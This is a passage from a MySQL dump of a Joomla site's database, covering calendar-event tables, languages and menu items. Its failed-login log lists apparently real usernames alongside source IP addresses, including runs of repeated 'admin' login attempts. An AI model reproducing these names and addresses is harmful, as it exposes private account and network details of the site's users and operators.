`rp_id` (`rp_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jevents_exception` -- LOCK TABLES `jos_jevents_exception` WRITE; /*!40000 ALTER TABLE `jos_jevents_exception` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_jevents_exception` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jevents_icsfile` -- DROP TABLE IF EXISTS `jos_jevents_icsfile`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jevents_icsfile` ( `ics_id` int(12) NOT NULL AUTO_INCREMENT, `srcURL` varchar(255) NOT NULL DEFAULT '', `label` varchar(30) NOT NULL DEFAULT '', `filename` varchar(120) NOT NULL DEFAULT '', `icaltype` tinyint(3) NOT NULL DEFAULT '0', `isdefault` tinyint(3) NOT NULL DEFAULT '0', `ignoreembedcat` tinyint(3) NOT NULL DEFAULT '0', `state` tinyint(3) NOT NULL DEFAULT '1', `access` int(11) unsigned NOT NULL DEFAULT '0', `catid` int(11) NOT NULL DEFAULT '1', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(11) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(100) NOT NULL DEFAULT '', `modified_by` int(11) unsigned NOT NULL DEFAULT '0', `refreshed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `autorefresh` tinyint(3) NOT NULL DEFAULT '0', `overlaps` tinyint(3) NOT NULL DEFAULT '0', PRIMARY KEY (`ics_id`), UNIQUE KEY `label` (`label`), KEY `stateidx` (`state`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jevents_icsfile` -- LOCK TABLES `jos_jevents_icsfile` WRITE; /*!40000 ALTER TABLE `jos_jevents_icsfile` DISABLE KEYS */; INSERT INTO `jos_jevents_icsfile` VALUES (1,'','Default','Initial ICS File',2,1,0,1,1,10,'0000-00-00 00:00:00',0,'',0,'0000-00-00 00:00:00',0,0); /*!40000 ALTER TABLE `jos_jevents_icsfile` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jevents_repetition` -- DROP TABLE IF EXISTS `jos_jevents_repetition`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jevents_repetition` ( `rp_id` int(12) NOT NULL AUTO_INCREMENT, `eventid` int(12) NOT NULL DEFAULT '1', `eventdetail_id` int(12) NOT NULL DEFAULT '0', `duplicatecheck` varchar(32) NOT NULL DEFAULT '', `startrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `endrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`rp_id`), UNIQUE KEY `duplicatecheck` (`duplicatecheck`), KEY `eventid` (`eventid`), KEY `eventstart` (`eventid`,`startrepeat`), KEY `eventend` (`eventid`,`endrepeat`), KEY `eventdetail` (`eventdetail_id`), KEY `startrepeat` (`startrepeat`), KEY `startend` (`startrepeat`,`endrepeat`), KEY `endrepeat` (`endrepeat`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jevents_repetition` -- LOCK TABLES `jos_jevents_repetition` WRITE; /*!40000 ALTER TABLE `jos_jevents_repetition` DISABLE KEYS */; INSERT INTO `jos_jevents_repetition` VALUES (2,2,2,'5a31902ddcb3e22447415231c551da1f','2013-06-13 08:00:00','2013-06-20 17:00:00'); /*!40000 ALTER TABLE `jos_jevents_repetition` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jevents_rrule` -- DROP TABLE IF EXISTS `jos_jevents_rrule`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jevents_rrule` ( `rr_id` int(12) NOT NULL AUTO_INCREMENT, `eventid` int(12) NOT NULL DEFAULT '1', `freq` varchar(30) NOT NULL DEFAULT '', `until` int(12) NOT NULL DEFAULT '1', `untilraw` varchar(30) NOT NULL DEFAULT '', `count` int(6) NOT NULL DEFAULT '1', `rinterval` int(6) NOT NULL DEFAULT '1', `bysecond` varchar(50) NOT NULL DEFAULT '', `byminute` varchar(50) NOT NULL DEFAULT '', `byhour` varchar(50) NOT NULL DEFAULT '', `byday` varchar(50) NOT NULL DEFAULT '', `bymonthday` varchar(50) NOT NULL DEFAULT '', `byyearday` varchar(50) NOT NULL DEFAULT '', `byweekno` varchar(50) NOT NULL DEFAULT '', `bymonth` varchar(50) NOT NULL DEFAULT '', `bysetpos` varchar(50) NOT NULL DEFAULT '', `wkst` varchar(50) NOT NULL DEFAULT '', PRIMARY KEY (`rr_id`), KEY `eventid` (`eventid`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jevents_rrule` -- LOCK TABLES `jos_jevents_rrule` WRITE; /*!40000 ALTER TABLE `jos_jevents_rrule` DISABLE KEYS */; INSERT INTO `jos_jevents_rrule` VALUES (2,2,'none',0,'',1,1,'','','','TH','','','','','',''); /*!40000 ALTER TABLE `jos_jevents_rrule` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jevents_vevdetail` -- DROP TABLE IF EXISTS `jos_jevents_vevdetail`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jevents_vevdetail` ( `evdet_id` int(12) NOT NULL AUTO_INCREMENT, `rawdata` longtext NOT NULL, `dtstart` int(11) NOT NULL DEFAULT '0', `dtstartraw` varchar(30) NOT NULL DEFAULT '', `duration` int(11) NOT NULL DEFAULT '0', `durationraw` varchar(30) NOT NULL DEFAULT '', `dtend` int(11) NOT NULL DEFAULT '0', `dtendraw` varchar(30) NOT NULL DEFAULT '', `dtstamp` varchar(30) NOT NULL DEFAULT '', `class` varchar(10) NOT NULL DEFAULT '', `categories` varchar(120) NOT NULL DEFAULT '', `color` varchar(20) NOT NULL DEFAULT '', `description` longtext NOT NULL, `geolon` float NOT NULL DEFAULT '0', `geolat` float NOT NULL DEFAULT '0', `location` varchar(120) NOT NULL DEFAULT '', `priority` tinyint(3) unsigned NOT NULL DEFAULT '0', `status` varchar(20) NOT NULL DEFAULT '', `summary` longtext NOT NULL, `contact` varchar(120) NOT NULL DEFAULT '', `organizer` varchar(120) NOT NULL DEFAULT '', `url` text NOT NULL, `extra_info` varchar(240) NOT NULL DEFAULT '', `created` varchar(30) NOT NULL DEFAULT '', `sequence` int(11) NOT NULL DEFAULT '1', `state` tinyint(3) NOT NULL DEFAULT '1', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `multiday` tinyint(3) NOT NULL DEFAULT '1', `hits` int(11) NOT NULL DEFAULT '0', `noendtime` tinyint(3) NOT NULL DEFAULT '0', PRIMARY KEY (`evdet_id`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jevents_vevdetail` -- LOCK TABLES `jos_jevents_vevdetail` WRITE; /*!40000 ALTER TABLE `jos_jevents_vevdetail` DISABLE KEYS */; INSERT INTO `jos_jevents_vevdetail` VALUES (2,'',1371124800,'',0,'',1371762000,'','','','','','<p>Testing event calendar for this month...</p>',0,0,'',0,'','Test 123','','','','','',0,1,'2013-06-13 00:58:57',1,2,0); /*!40000 ALTER TABLE `jos_jevents_vevdetail` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jevents_vevent` -- DROP TABLE IF EXISTS `jos_jevents_vevent`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jevents_vevent` ( `ev_id` int(12) NOT NULL AUTO_INCREMENT, `icsid` int(12) NOT NULL DEFAULT '0', `catid` int(11) NOT NULL DEFAULT '1', `uid` varchar(255) NOT NULL DEFAULT '', `refreshed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(11) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(100) NOT NULL DEFAULT '', `modified_by` int(11) unsigned NOT NULL DEFAULT '0', `rawdata` longtext NOT NULL, `recurrence_id` varchar(30) NOT NULL DEFAULT '', `detail_id` int(12) NOT NULL DEFAULT '0', `state` tinyint(3) NOT NULL DEFAULT '1', `lockevent` tinyint(3) NOT NULL DEFAULT '0', `author_notified` tinyint(3) NOT NULL DEFAULT '0', `access` int(11) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`ev_id`), UNIQUE KEY `uid` (`uid`), KEY `icsid` (`icsid`), KEY `stateidx` (`state`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jevents_vevent` -- LOCK TABLES `jos_jevents_vevent` WRITE; /*!40000 ALTER TABLE `jos_jevents_vevent` DISABLE KEYS */; INSERT INTO `jos_jevents_vevent` VALUES (2,1,10,'6ea5c7f57e54bf60ef2bfb3ec5c9e32d','0000-00-00 00:00:00','2013-06-13 00:58:57',48,'',47,'a:20:{s:3:\"UID\";s:32:\"6ea5c7f57e54bf60ef2bfb3ec5c9e32d\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:0:\"\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:47:\"<p>Testing event calendar for this month...</p>\";s:12:\"publish_down\";s:9:\"2013-6-20\";s:10:\"publish_up\";s:9:\"2013-6-13\";s:13:\"publish_down2\";s:9:\"2013-6-20\";s:11:\"publish_up2\";s:9:\"2013-6-13\";s:7:\"SUMMARY\";s:8:\"Test 123\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:48;s:7:\"DTSTART\";i:1371124800;s:5:\"DTEND\";i:1371762000;s:5:\"RRULE\";a:4:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:5:\"BYDAY\";s:2:\"TH\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}','',2,1,0,0,1); /*!40000 ALTER TABLE `jos_jevents_vevent` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_languages` -- DROP TABLE IF EXISTS `jos_languages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_languages` ( `lang_id` int(11) unsigned NOT NULL AUTO_INCREMENT, `lang_code` char(7) NOT NULL, `title` varchar(50) NOT NULL, `title_native` varchar(50) NOT NULL, `sef` varchar(50) NOT NULL, `image` varchar(50) NOT NULL, `description` varchar(512) NOT NULL, `metakey` text NOT NULL, `metadesc` text NOT NULL, `sitename` varchar(1024) NOT NULL DEFAULT '', `published` int(11) NOT NULL DEFAULT '0', `access` int(10) unsigned NOT NULL DEFAULT '0', `ordering` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`lang_id`), UNIQUE KEY `idx_sef` (`sef`), UNIQUE KEY `idx_image` (`image`), UNIQUE KEY `idx_langcode` (`lang_code`), KEY `idx_ordering` (`ordering`), KEY `idx_access` (`access`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_languages` -- LOCK TABLES `jos_languages` WRITE; /*!40000 ALTER TABLE `jos_languages` DISABLE KEYS */; INSERT INTO `jos_languages` VALUES (1,'en-GB','English (UK)','English (UK)','en','en','','','','',1,0,1); /*!40000 ALTER TABLE `jos_languages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_loginfailedlog` -- DROP TABLE IF EXISTS `jos_loginfailedlog`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_loginfailedlog` ( `id` int(10) NOT NULL AUTO_INCREMENT, `username` varchar(25) NOT NULL, `password` varchar(25) NOT NULL, `login_ip` varchar(35) NOT NULL, `error` varchar(55) NOT NULL, `date` varchar(35) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=94 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_loginfailedlog` -- LOCK TABLES `jos_loginfailedlog` WRITE; /*!40000 ALTER TABLE `jos_loginfailedlog` DISABLE KEYS */; INSERT INTO `jos_loginfailedlog` VALUES (1,'mikonsulting',' ','66.101.235.4','Username and password do not match or you do not have a','06-11-2013, 04:50 AM'),(2,'hallcrestadmin',' ','58.69.91.163','Username and password do not match or you do not have a','07-23-2013, 11:58 AM'),(3,'mikonsulting',' ','58.69.90.141','Username and password do not match or you do not have a','09-05-2013, 09:55 AM'),(4,'mikonsulting',' ','70.168.131.176','Username and password do not match or you do not have a','09-10-2013, 10:50 AM'),(5,'hallcrestadmin',' ','58.69.90.249','Username and password do not match or you do not have a','10-04-2013, 01:06 AM'),(6,'mikonsulting',' ','58.69.90.249','Username and password do not match or you do not have a','10-04-2013, 01:06 AM'),(7,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:02 AM'),(8,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:08 AM'),(9,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:11 AM'),(10,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:14 AM'),(11,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:17 AM'),(12,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:20 AM'),(13,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:23 AM'),(14,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:26 AM'),(15,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:29 AM'),(16,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:31 AM'),(17,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:34 AM'),(18,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:37 AM'),(19,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:40 AM'),(20,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:42 AM'),(21,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:45 AM'),(22,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:48 AM'),(23,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:51 AM'),(24,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:56 AM'),(25,'admin',' ','91.121.108.208','Username and password do not match or you do not have a','11-16-2013, 06:59 AM'),(26,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:27 PM'),(27,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:27 PM'),(28,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:27 PM'),(29,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:27 PM'),(30,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:28 PM'),(31,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:28 PM'),(32,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:28 PM'),(33,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:28 PM'),(34,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-22-2013, 03:29 PM'),(35,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:31 PM'),(36,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:31 PM'),(37,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:31 PM'),(38,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:31 PM'),(39,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:32 PM'),(40,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(41,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(42,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(43,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(44,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(45,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(46,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(47,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(48,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(49,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(50,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:33 PM'),(51,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:34 PM'),(52,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-23-2013, 12:34 PM'),(53,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:24 PM'),(54,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:24 PM'),(55,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:24 PM'),(56,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:24 PM'),(57,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:24 PM'),(58,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(59,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(60,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(61,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(62,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(63,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(64,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(65,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(66,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(67,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(68,'admin',' ','188.143.232.173','Username and password do not match or you do not have a','11-24-2013, 10:25 PM'),(69,'admin',' ','64.120.216.114','Username and password do not match or you do not have a','11-25-2013, 09:18 AM'),(70,'administrator',' ','64.120.216.114','Username and password do not match or you do not have a','11-25-2013, 09:34 AM'),(71,'admin',' ','64.120.216.114','Username and password do not match or you do not have a','11-25-2013, 09:50 AM'),(72,'administrator',' ','64.120.216.114','Username and password do not match or you do not have a','11-25-2013, 10:07 AM'),(73,'admin',' ','64.120.216.114','Username and password do not match or you do not have a','11-25-2013, 10:25 AM'),(74,'administrator',' ','64.120.216.114','Username and password do not match or you do not have a','11-25-2013, 10:42 AM'),(75,'hallcrestadmin',' ','58.69.95.230','Username and password do not match or you do not have a','11-30-2013, 10:46 AM'),(76,'mikonsulting',' ','98.169.160.156','Username and password do not match or you do not have a','11-30-2013, 10:47 AM'),(77,'richard',' ','58.69.95.230','Username and password do not match or you do not have a','11-30-2013, 10:48 AM'),(78,'richard',' ','58.69.95.230','Username and password do not match or you do not have a','11-30-2013, 10:54 AM'),(79,'hallcrest',' ','98.169.52.250','Username and password do not match or you do not have a','12-01-2013, 02:44 PM'),(80,'hallcrest',' ','98.169.52.250','Username and password do not match or you do not have a','08-23-2014, 10:54 AM'),(81,'hallcrest',' ','98.169.52.250','Username and password do not match or you do not have a','08-23-2014, 10:54 AM'),(82,'john.aranha',' ','98.169.52.250','Username and password do not match or you do not have a','08-23-2014, 12:12 PM'),(83,'twethington',' ','98.190.240.205','Username and password do not match or you do not have a','05-04-2015, 08:38 PM'),(84,'test',' ','193.169.252.98','Username and password do not match or you do not have a','01-07-2017, 12:23 PM'),(85,'test',' ','193.169.252.98','Username and password do not match or you do not have a','01-07-2017, 12:23 PM'),(86,'test',' ','193.169.252.98','Username and password do not match or you do not have a','01-07-2017, 12:24 PM'),(87,'mternieden',' ','64.124.100.19','Username and password do not match or you do not have a','03-03-2017, 11:48 AM'),(88,'mternieden',' ','64.124.100.19','Username and password do not match or you do not have a','03-03-2017, 11:53 AM'),(89,'mdternieden',' ','64.124.100.19','Username and password do not match or you do not have a','06-21-2017, 08:16 AM'),(90,'mternieden',' ','64.124.100.19','Username and password do not match or you do not have a','06-21-2017, 08:17 AM'),(91,'mdternieden',' ','98.169.55.82','Username and password do not match or you do not have a','06-24-2017, 08:43 AM'),(92,'mternieden',' ','64.124.100.19','Username and password do not match or you do not have a','11-07-2017, 01:57 PM'),(93,'mternieden',' ','64.124.100.19','Username and password do not match or you do not have a','11-07-2017, 01:59 PM'); /*!40000 ALTER TABLE `jos_loginfailedlog` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_menu` -- DROP TABLE IF EXISTS `jos_menu`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_menu` ( `id` int(11) NOT NULL AUTO_INCREMENT, `menutype` varchar(24) NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype', `title` varchar(255) NOT NULL COMMENT 'The display title of the menu item.', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT 'The SEF alias of the menu item.', `note` varchar(255) NOT NULL DEFAULT '', `path` varchar(1024) NOT NULL COMMENT 'The computed path of the menu item based on the alias field.', `link` varchar(1024) NOT NULL COMMENT 'The actually link the menu item refers to.', `type` varchar(16) NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator', `published` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The published state of the menu link.', `parent_id` int(10) unsigned NOT NULL DEFAULT '1' COMMENT 'The parent menu item in the menu tree.', `level` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The relative level in the tree.', `component_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__extensions.id', `checked_out` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__users.id', `checked_out_time` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.', `browserNav` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The click behaviour of the link.', `access` int(10) unsigned DEFAULT NULL, `img` varchar(255) NOT NULL COMMENT 'The image of the menu item.', `template_style_id` int(10) unsigned NOT NULL DEFAULT '0', `params` text NOT NULL COMMENT 'JSON encoded data for the menu item.', `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.', `home` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Indicates if this menu item is the home or default page.', `language` char(7) NOT NULL DEFAULT '', `client_id` tinyint(4) NOT NULL DEFAULT '0', PRIMARY KEY (`id`), UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`,`language`), KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`), KEY `idx_menutype` (`menutype`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_path` (`path`(255)), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=201 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_menu` -- LOCK TABLES `jos_menu` WRITE; /*!40000 ALTER TABLE `jos_menu` DISABLE KEYS */; INSERT INTO `jos_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,131,0,'*',0),(2,'menu','com_banners','Banners','','Banners','index.php?option=com_banners','component',0,1,1,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',3,12,0,'*',1),(3,'menu','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',4,5,0,'*',1),(4,'menu','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',0,2,2,6,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',6,7,0,'*',1),(5,'menu','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',8,9,0,'*',1),(6,'menu','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',10,11,0,'*',1),(7,'menu','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',0,1,1,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',13,18,0,'*',1),(8,'menu','com_contact','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',0,7,2,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',14,15,0,'*',1),(9,'menu','com_contact_categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',0,7,2,6,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',16,17,0,'*',1),(10,'menu','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',0,1,1,15,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',19,24,0,'*',1),(11,'menu','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',20,21,0,'*',1),(12,'menu','com_messages_read','Read Private Message','','Messaging/Read Private Message','index.php?option=com_messages','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-read',0,'',22,23,0,'*',1),(13,'menu','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',0,1,1,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',25,30,0,'*',1),(14,'menu','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',0,13,2,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',26,27,0,'*',1),(15,'menu','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',0,13,2,6,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',28,29,0,'*',1),(16,'menu','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',0,1,1,24,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',39,40,0,'*',1),(17,'menu','com_search','Search','','Search','index.php?option=com_search','component',0,1,1,19,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',31,32,0,'*',1),(18,'menu','com_weblinks','Weblinks','','Weblinks','index.php?option=com_weblinks','component',0,1,1,21,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',33,38,0,'*',1),(19,'menu','com_weblinks_links','Links','','Weblinks/Links','index.php?option=com_weblinks','component',0,18,2,21,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',34,35,0,'*',1),(20,'menu','com_weblinks_categories','Categories','','Weblinks/Categories','index.php?option=com_categories&extension=com_weblinks','component',0,18,2,6,0,'0000-00-00 00:00:00',0,0,'class:weblinks-cat',0,'',36,37,0,'*',1),(21,'menu','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',0,1,1,27,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',61,62,0,'*',1),(22,'menu','com_joomlaupdate','Joomla! Update','','Joomla! Update','index.php?option=com_joomlaupdate','component',0,1,1,28,0,'0000-00-00 00:00:00',0,0,'class:joomlaupdate',0,'',59,60,0,'*',1),(23,'main','com_tags','Tags','','Tags','index.php?option=com_tags','component',0,1,1,29,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'',57,58,0,'',1),(101,'mainmenu','Home','home','','home','index.php?option=com_content&view=featured','component',1,1,1,22,0,'0000-00-00 